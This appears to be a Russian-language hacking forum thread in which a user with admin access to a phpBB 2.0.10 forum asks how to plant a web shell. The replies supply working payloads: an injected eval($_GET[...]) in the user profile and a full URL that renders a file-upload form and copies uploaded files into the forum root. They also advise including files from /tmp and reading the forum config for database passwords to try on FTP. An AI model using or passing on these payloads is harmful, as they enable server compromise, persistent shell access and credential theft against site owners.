Форум - phpBB 2.0.10 Есть доступ к админке. Не получается залить шелл ни через уязвимость highlight, ни через стили, ни через профайл, ни через заливку sql (восстановление БД). Попробовал через загрузку аватары - пишет, что максимальный размер 9 кб. Такая же история (про аватару) через багу ShanKaR'а. Посоветуйте что-нибудь, plizzzzzzzz !!! Ща поковырялся и получилось c помощью видео ShAnKaR'а вставить в профиль функию phpinfo(). А bandera объяснял о функции - a:include($_GET[w]) Я делал всё так и ничего не происходит. Почему?
мм а с аватарой проблему не решить путем увеличения лимита загружаемого файла? или о_0 это в админке не редактируется? мм хотя мб там фильтрация стоит, но все же проверь..
ну инклуде http не всегда работает в силу нескоьких причин , поэтому чтобы проверить что происходит ли вобще php injection тестим на phpinfo() например, а вобще можно и без include обойтись, например с помощью eval($_GET[q]): http://forum.com/profile.php?q=print($_GET[t]);if(isset($_POST[go_up])){if(is_uploaded_file($_FILES[userfile][tmp_name])){@co py($_FILES[userfile][tmp_name],$_FILES[userfile][name]);}};exit;&t=<form enctype=multipart/form-data method=post><input name=userfile type=file><input type=submit name=go_up></form>
Ответ... Вот, что получается: Я новичок, и не совсем понимаю.... Объясни пожалуйста пошагово.... Увеличил я размер загружаемой аватары и сделал как описывал k1b0rg в статье: И всё равно ничего не вышло... Пишет: , хотя я и переименовывал в jpg, gif.
кароче вот вместо a:include($_GET[w]) ставишь a:eval($_GET[w]) потом идешь как и в случае с include по адресу /profile.php?mode=editprofile&w=print($_GET[t]);if(isset($_POST[go_up])){if(is_uploaded_file($_FILES[userfile][tmp_name])){@co py($_FILES[userfile][tmp_name],$_FILES[userfile][name]);}};exit;&t=<form enctype=multipart/form-data method=post><input name=userfile type=file><input type=submit name=go_up></form> если все ok появляется формочка для заливки файла , и тут уже можешь залить все что надо, залитое сохраняется в корневой папке форума в данном случае, это самый простой способ я думаю , но можно например воспользоватся другими функциями php например fopen,fwrite и тп для создания файла. можно так же если не получится залить файл в папку с форумом залить в /tmp, а потом проинклудить его из /tmp. если вобще ни куда не получится залить, можно посмотреть конфиг форума с пасом от бд и попробовать пасы на ftp например.